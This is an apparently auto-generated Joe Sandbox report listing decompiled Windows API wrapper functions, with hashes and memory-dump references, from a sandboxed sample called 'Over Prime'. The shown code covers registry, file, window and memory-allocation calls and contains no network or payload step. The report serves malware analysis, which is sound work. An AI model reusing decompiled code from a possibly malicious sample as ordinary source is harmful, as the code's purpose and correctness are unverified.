Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD

Uniqueness

Uniqueness Score: -1.00%

Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401735() {
				long _t5;
				WCHAR* _t8;
				WCHAR* _t11;
				void* _t14;
				long _t17;

				_t5 = SearchPathW(_t8, E00402DA6(0xffffffff), _t8, 0x400, _t11, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t11 = _t8;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}

0x00401749
0x0040174f
0x00401751
0x004028fc
0x00402903
0x00402903
0x00402c2d
0x00402c39

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 2abd0f1efffa68a6bb474862c752ad4ddae2f14f50b996b3fa306cd2bd2dbd2f
Instruction ID: d26ddeb61d2ccf759e8219b8bf11ae614783952553bc57ee900ccbf6089d5517
Opcode Fuzzy Hash: 2abd0f1efffa68a6bb474862c752ad4ddae2f14f50b996b3fa306cd2bd2dbd2f
Instruction Fuzzy Hash: B2E08072304105EBE740DB64DD49FAE736CDF40368F204537E111E50D1E6B49945A71D

Uniqueness

Uniqueness Score: -1.00%

Function 004063D8 Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004063e2
0x004063eb
0x00406401
0x00000000
0x00406401
0x004063ef
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675

Uniqueness

Uniqueness Score: -1.00%

Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060DF(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060e3
0x004060f3
0x004060fb
0x00000000
0x00406102
0x00000000
0x00406104

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060B0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060b4
0x004060c4
0x004060cc
0x00000000
0x004060d3
0x00000000
0x004060d5

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4

Uniqueness

Uniqueness Score: -1.00%

Function 73B92A7F Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73b95048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x73b9505c, 4, 0x40, 0x73b9504c); // executed
					 *0x73b9505c = 0xc2;
					 *0x73b9504c = 0;
					 *0x73b95054 = 0;
					 *0x73b95068 = 0;
					 *0x73b95058 = 0;
					 *0x73b95050 = 0;
					 *0x73b95060 = 0;
					 *0x73b9505e = 0;
				}
				return 1;
			}

0x73b92a88
0x73b92a8d
0x73b92a9d
0x73b92aa5
0x73b92aac
0x73b92ab1
0x73b92ab6
0x73b92abb
0x73b92ac0
0x73b92ac5
0x73b92aca
0x73b92aca
0x73b92ad2

APIs

VirtualProtect.KERNELBASE(73B9505C,00000004,00000040,73B9504C), ref: 73B92A9D

Memory Dump Source

Source File: 00000000.00000002.1008093316.0000000073B91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B90000, based on PE: true

Associated: 00000000.00000002.1008035797.0000000073B90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008178961.0000000073B94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008235435.0000000073B96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b90000_Over Prime.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d7cdba0ce147d001825ed9e70c6a3c75add202c24a5821c2fa55029f3674bd77
Instruction ID: 1f2f22954376355f1a8dd3ca21de75792d51ba57a87ee22adc12a91046140fb0
Opcode Fuzzy Hash: d7cdba0ce147d001825ed9e70c6a3c75add202c24a5821c2fa55029f3674bd77
Instruction Fuzzy Hash: 8CF09BF2A85280DED370EF2B87857093BE0B709204B27463BE19CEBA81E3345046DB95

Uniqueness

Uniqueness Score: -1.00%

Function 004063AA Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004063b4
0x004063bb
0x004063ce
0x00000000
0x004063ce
0x004063bf
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 33e977613f43845a6e57c4863c60741a5f6cc7a9a237a98d0a4dda90b58cd89e
Instruction ID: 33d43a8ddb5fee1851102b8e64c9f064c627007e01bf6cdc746e786b0f5045d9
Opcode Fuzzy Hash: 33e977613f43845a6e57c4863c60741a5f6cc7a9a237a98d0a4dda90b58cd89e
Instruction Fuzzy Hash: 30D01772B08110DBDB11DBA8AA48B9D72A4AB50368B208537D111F61D0E6B8C945AA19

Uniqueness

Uniqueness Score: -1.00%

Function 004044E5 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044E5(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x433ed8; // 0xf0080
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004044e5
0x004044ec
0x004044f7
0x00000000
0x004044f7
0x004044fd

APIs

SendMessageW.USER32(000F0080,00000000,00000000,00000000), ref: 004044F7

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C

Uniqueness

Uniqueness Score: -1.00%

Function 004044CE Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044CE(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
				return _t2;
			}

0x004044dc
0x004044e2

APIs

SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08

Uniqueness

Uniqueness Score: -1.00%

Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034E5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004034f3
0x004034f9

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004044BB Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044BB(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42d264, _a4); // executed
				return _t2;
			}

0x004044c5
0x004044cb

APIs

KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 73B92B98 Relevance: 1.4, APIs: 1, Instructions: 143
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E73B92B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				void* _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x73b95050 != 0 && E73B92ADB(_a4) == 0) {
					 *0x73b95054 = _t93;
					if( *0x73b9504c != 0) {
						_t93 =  *0x73b9504c;
					} else {
						E73B930C0(E73B92AD5(), __ecx);
						 *0x73b9504c = _t93;
					}
				}
				_t28 = E73B92B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E73B92AFD();
					_t72 = _a4;
					_t79 =  *0x73b95058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x73b95058 = _t72;
					E73B92AF7();
					_t33 = VirtualAlloc(??, ??, ??, ??); // executed
					 *0x73b95034 = _t33;
					 *0x73b95038 = _t79;
					if( *0x73b95050 != 0 && E73B92ADB( *0x73b95058) == 0) {
						 *0x73b9504c = _t94;
						_t94 =  *0x73b95054;
					}
					_t80 =  *0x73b95058;
					_a4 = _t80;
					 *0x73b95058 =  *((intOrPtr*)(E73B92AFD() + _t80));
					_t37 = E73B92AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E73B92B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E73B92B14() + _a4 + _v8);
							_push(E73B92B1E());
							if( *0x73b95050 <= 0 || E73B92ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x73b9504c =  *0x73b9504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x73b95058;
					if( *0x73b95058 == 0) {
						 *0x73b9504c = 0;
					}
					E73B92B42(_t107, _a4,  *0x73b95034,  *0x73b95038);
					return _a4;
				}
				_push(E73B92B14() + _a4);
				_t56 = E73B92B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E73B92B26();
				_t87 = E73B92B22();
				_t90 = E73B92B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x73b92ba8
0x73b92bb9
0x73b92bc6
0x73b92bda
0x73b92bc8
0x73b92bcd
0x73b92bd2
0x73b92bd2
0x73b92bc6
0x73b92be3
0x73b92be8
0x73b92bee
0x73b92c32
0x73b92c32
0x73b92c37
0x73b92c3c
0x73b92c42
0x73b92c44
0x73b92c4a
0x73b92c57
0x73b92c59
0x73b92c5e
0x73b92c6b
0x73b92c7e
0x73b92c84
0x73b92c8a
0x73b92c8b
0x73b92c91
0x73b92c9d
0x73b92ca3
0x73b92cab
0x73b92cac
0x73b92caf
0x73b92cba
0x73b92cbc
0x73b92cc8
0x73b92cce
0x73b92cd6
0x73b92d02
0x73b92d03
0x73b92d05
0x73b92d09
0x73b92d09
0x73b92d10
0x73b92ce6
0x73b92ce6
0x73b92ce7
0x73b92cf5
0x73b92cfe
0x73b92cfe
0x73b92cd6
0x73b92cba
0x73b92d12
0x73b92d19
0x73b92d1b
0x73b92d1b
0x73b92d34
0x73b92d42
0x73b92d42
0x73b92bf9
0x73b92bfa
0x73b92bff
0x73b92c03
0x73b92c08
0x73b92c1c
0x73b92c1d
0x73b92c1e
0x73b92c20
0x73b92c25
0x73b92c27
0x73b92c27
0x73b92c2a
0x73b92c30
0x00000000

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 73B92C57

Memory Dump Source

